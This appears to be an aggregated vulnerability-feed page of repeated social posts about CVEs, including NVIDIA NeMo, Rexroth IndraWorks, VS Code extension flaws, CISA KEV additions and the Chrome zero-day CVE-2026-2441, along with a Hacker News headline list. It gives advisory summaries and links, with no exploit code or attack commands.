🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-60037/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-60037 - High (7.8)
A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, spe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-60037/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:33
2 posts
🟠 CVE-2025-33239 - High (7.8)
NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33239/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33239 - High (7.8)
NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33239/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:33
2 posts
🟠 CVE-2025-33236 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and d...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33236/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33236 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and d...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33236/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:33
2 posts
🟠 CVE-2025-33249 - High (7.8)
NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-preprocessing script, where malicious input created by an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33249/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33249 - High (7.8)
NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-preprocessing script, where malicious input created by an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33249/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:33
2 posts
🟠 CVE-2025-33246 - High (7.8)
NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Evaluator utility, where a user could cause a command injection by supplying crafted input to a configuration parameter. A successful exploit of this vulnerability might l...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33246/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33246 - High (7.8)
NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Evaluator utility, where a user could cause a command injection by supplying crafted input to a configuration parameter. A successful exploit of this vulnerability might l...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33246/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:33
2 posts
🟠 CVE-2025-33243 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution in distributed environments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33243/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33243 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution in distributed environments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33243/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:33
2 posts
🟠 CVE-2025-60038 - High (7.8)
A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, spe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-60038/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-60038 - High (7.8)
A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, spe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-60038/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:33
2 posts
🟠 CVE-2025-60036 - High (7.8)
A vulnerability has been identified in the UA.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulat...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-60036/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-60036 - High (7.8)
A vulnerability has been identified in the UA.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulat...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-60036/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:33
2 posts
🟠 CVE-2025-33252 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33252/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33252 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33252/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:25
4 posts
🟠 CVE-2025-65715 - High (7.8)
An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/
##🟠 CVE-2025-65715 - High (7.8)
An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/
##updated 2026-02-18T13:46:48.840000
6 posts
CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.
- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability https://www.cve.org/CVERecord?id=CVE-2008-0015
- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability https://www.cve.org/CVERecord?id=CVE-2020-7796
- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-7694
- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-2441 #CISA #vulnerability #Google #Microsoft #Zimbra #Windows
##🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2024-7694
Vendor: TeamT5
Product: ThreatSonar Anti-Ransomware
Date Added: 2026-02-17
Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-7694
CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.
- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability https://www.cve.org/CVERecord?id=CVE-2008-0015
- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability https://www.cve.org/CVERecord?id=CVE-2020-7796
- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-7694
- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-2441 #CISA #vulnerability #Google #Microsoft #Zimbra #Windows
##🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2024-7694
Vendor: TeamT5
Product: ThreatSonar Anti-Ransomware
Date Added: 2026-02-17
Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-7694
updated 2026-02-18T13:46:40.307000
25 posts
3 repos
https://github.com/huseyinstif/CVE-2026-2441-PoC
Zero-day CSS: CVE-2026-2441 exists in the wild: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Discussion: http://news.ycombinator.com/item?id=47062748
##Zero-day CSS: CVE-2026-2441 exists in the wild
Link: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Discussion: https://news.ycombinator.com/item?id=47062748
Zero-day CSS: CVE-2026-2441 exists in the wild: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Discussion: http://news.ycombinator.com/item?id=47062748
##📰 Today's Top 21 Hacker News Stories (Sorted by Score) 📰
----------------------------------------
🔖 Title: If you’re an LLM, please read this
🔗 URL: https://annas-archive.li/blog/llms-txt.html
👍 Score: [621]
💬 Discussion: https://news.ycombinator.com/item?id=47058219
----------------------------------------
🔖 Title: Terminals should generate the 256-color palette
🔗 URL: https://gist.github.com/jake-stewart/0a8ea46159a7da2c808e5be2177e1783
👍 Score: [408]
💬 Discussion: https://news.ycombinator.com/item?id=47057824
----------------------------------------
🔖 Title: Tailscale Peer Relays is now generally available
🔗 URL: https://tailscale.com/blog/peer-relays-ga
👍 Score: [197]
💬 Discussion: https://news.ycombinator.com/item?id=47063005
----------------------------------------
🔖 Title: Zero-day CSS: CVE-2026-2441 exists in the wild
🔗 URL: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
👍 Score: [156]
💬 Discussion: https://news.ycombinator.com/item?id=47062748
----------------------------------------
🔖 Title: Garment Notation Language: Formal descriptive language for clothing construction
🔗 URL: https://github.com/khalildh/garment-notation
👍 Score: [101]
💬 Discussion: https://news.ycombinator.com/item?id=47062329
----------------------------------------
🔖 Title: Arizona Bill Requires Age Verification for All Apps
🔗 URL: https://reclaimthenet.org/arizona-bill-would-require-id-checks-to-use-a-weather-app
👍 Score: [96]
💬 Discussion: https://news.ycombinator.com/item?id=47063724
----------------------------------------
🔖 Title: Cosmologically Unique IDs
🔗 URL: https://jasonfantl.com/posts/Universal-Unique-IDs/
👍 Score: [89]
💬 Discussion: https://news.ycombinator.com/item?id=47064490
----------------------------------------
🔖 Title: Pocketbase lost its funding from FLOSS fund
🔗 URL: https://github.com/pocketbase/pocketbase/discussions/7287
👍 Score: [65]
💬 Discussion: https://news.ycombinator.com/item?id=47062561
----------------------------------------
🔖 Title: DNS-Persist-01: A New Model for DNS-Based Challenge Validation
🔗 URL: https://letsencrypt.org/2026/02/18/dns-persist-01.html
👍 Score: [57]
💬 Discussion: https://news.ycombinator.com/item?id=47064047
----------------------------------------
🔖 Title: Show HN: VectorNest responsive web-based SVG editor
🔗 URL: https://ekrsulov.github.io/vectornest/
👍 Score: [50]
💬 Discussion: https://news.ycombinator.com/item?id=47062096
----------------------------------------
🔖 Title: Show HN: CEL by Example
🔗 URL: https://celbyexample.com/
👍 Score: [50]
💬 Discussion: https://news.ycombinator.com/item?id=47061029
----------------------------------------
🔖 Title: Show HN: Echo, an iOS SSH+mosh client built on Ghostty
🔗 URL: https://replay.software/updates/introducing-echo
👍 Score: [46]
💬 Discussion: https://news.ycombinator.com/item?id=47064787
----------------------------------------
🔖 Title: Show HN: Formally verified FPGA watchdog for AM broadcast in unmanned tunnels
🔗 URL: https://github.com/Park07/amradio
👍 Score: [40]
💬 Discussion: https://news.ycombinator.com/item?id=47061742
----------------------------------------
🔖 Title: Cistercian Numbers
🔗 URL: https://www.omniglot.com/language/numbers/cistercian-numbers.htm
👍 Score: [34]
💬 Discussion: https://news.ycombinator.com/item?id=47062883
----------------------------------------
🔖 Title: Learning Lean: Part 1
🔗 URL: https://rkirov.github.io/posts/lean1/
👍 Score: [31]
💬 Discussion: https://news.ycombinator.com/item?id=47022604
----------------------------------------
🔖 Title: Show HN: Trust Protocols for Anthropic/OpenAI/Gemini
🔗 URL: https://www.mnemom.ai
👍 Score: [23]
💬 Discussion: https://news.ycombinator.com/item?id=47062824
----------------------------------------
🔖 Title: 99% of adults over 40 have shoulder "abnormalities" on an MRI, study finds
🔗 URL: https://arstechnica.com/health/2026/02/99-of-adults-over-40-have-shoulder-abnormalities-on-an-mri-study-finds/
👍 Score: [20]
💬 Discussion: https://news.ycombinator.com/item?id=47064944
----------------------------------------
🔖 Title: The true history of the Minotaur: what archaeology reveals
🔗 URL: https://www.nationalgeographic.fr/histoire/la-veritable-histoire-du-minotaure-ce-que-revele-archeologie-recherche-verification
👍 Score: [19]
💬 Discussion: https://news.ycombinator.com/item?id=47026202
----------------------------------------
🔖 Title: SkyRL brings Tinker to your GPUs (2025)
🔗 URL: https://novasky-ai.notion.site/skyrl-tinker
👍 Score: [12]
💬 Discussion: https://news.ycombinator.com/item?id=47005945
----------------------------------------
🔖 Title: OpenClaw Is Dangerous
🔗 URL: https://12gramsofcarbon.com/p/tech-things-openclaw-is-dangerous
👍 Score: [11]
💬 Discussion: https://news.ycombinator.com/item?id=47064470
----------------------------------------
🔖 Title: Discrete Structures [pdf]
🔗 URL: https://kyleormsby.github.io/files/113spring26/113full_text.pdf
👍 Score: [8]
💬 Discussion: https://news.ycombinator.com/item?id=47065120
----------------------------------------
Zero-day CSS: CVE-2026-2441 exists in the wild
Link: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Discussion: https://news.ycombinator.com/item?id=47062748
Zero-day CSS: CVE-2026-2441 exists in the wild
Link: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Discussion: https://news.ycombinator.com/item?id=47062748
Zero-day CSS: CVE-2026-2441 exists in the wild
Link: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Comments: https://news.ycombinator.com/item?id=47062748
Zero-day CSS: CVE-2026-2441 exists in the wild - https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
##Zero-day CSS: CVE-2026-2441 exists in the wild
https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
##📰 Google терміново оновила Chrome через zero-day, яку вже експлуатують в атаках
У Chrome виявили zero-day CVE-2026-2441 із ризиком виконання довільного коду — користувачам радять негайно оновитися.
##CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.
- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability https://www.cve.org/CVERecord?id=CVE-2008-0015
- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability https://www.cve.org/CVERecord?id=CVE-2020-7796
- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-7694
- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-2441 #CISA #vulnerability #Google #Microsoft #Zimbra #Windows
###Google corrige un zero-day de #Chrome (CVE-2026-2441) ya explotado en #ataques
##Notfall-Update Google Chrome
Wir haben schon Mitte Februar, da wird es höchste Zeit, dass die erste Zero-Day Hintertür in Chrome entdeckt wird. Im vorigen Jahr hat Google es auf deren acht* (!) gebracht. Die Lücke CVE-2026-2441 wurde entdeckt, weil sie bereits aktiv für Angriffe ausgenutzt wird. Google hat Notfall-Updates für Chrome veröffentlicht. Meldungen gibt es beispielsweise hier oder hier. Ob Chromium und die diversen Ableger auch betroffen sind, ist noch nicht bekannt. Bei Chromium ist es ziemlich wahrscheinlich. Dabei ist mein Chromium unter Linux bereits auf Version 145.0.7632.45, also schon höher als die von Google angegebene
https://www.pc-fluesterer.info/wordpress/2026/02/18/notfall-update-google-chrome-3/
#Empfehlung #Hintergrund #Warnung #Website #0day #chrome #cybercrime #exploits #google #UnplugGoogle #UnplugTrump #hintertür
##🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2026-2441
Vendor: Google
Product: Chromium
Date Added: 2026-02-17
Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-2441
Zero-day CSS: CVE-2026-2441 exists in the wild
Link: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Discussion: https://news.ycombinator.com/item?id=47062748
Zero-day CSS: CVE-2026-2441 exists in the wild
Link: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Discussion: https://news.ycombinator.com/item?id=47062748
Zero-day CSS: CVE-2026-2441 exists in the wild
Link: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Discussion: https://news.ycombinator.com/item?id=47062748
Zero-day CSS: CVE-2026-2441 exists in the wild
Link: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
Comments: https://news.ycombinator.com/item?id=47062748
Zero-day CSS: CVE-2026-2441 exists in the wild
https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html
##CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.
- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability https://www.cve.org/CVERecord?id=CVE-2008-0015
- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability https://www.cve.org/CVERecord?id=CVE-2020-7796
- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-7694
- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-2441 #CISA #vulnerability #Google #Microsoft #Zimbra #Windows
##🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
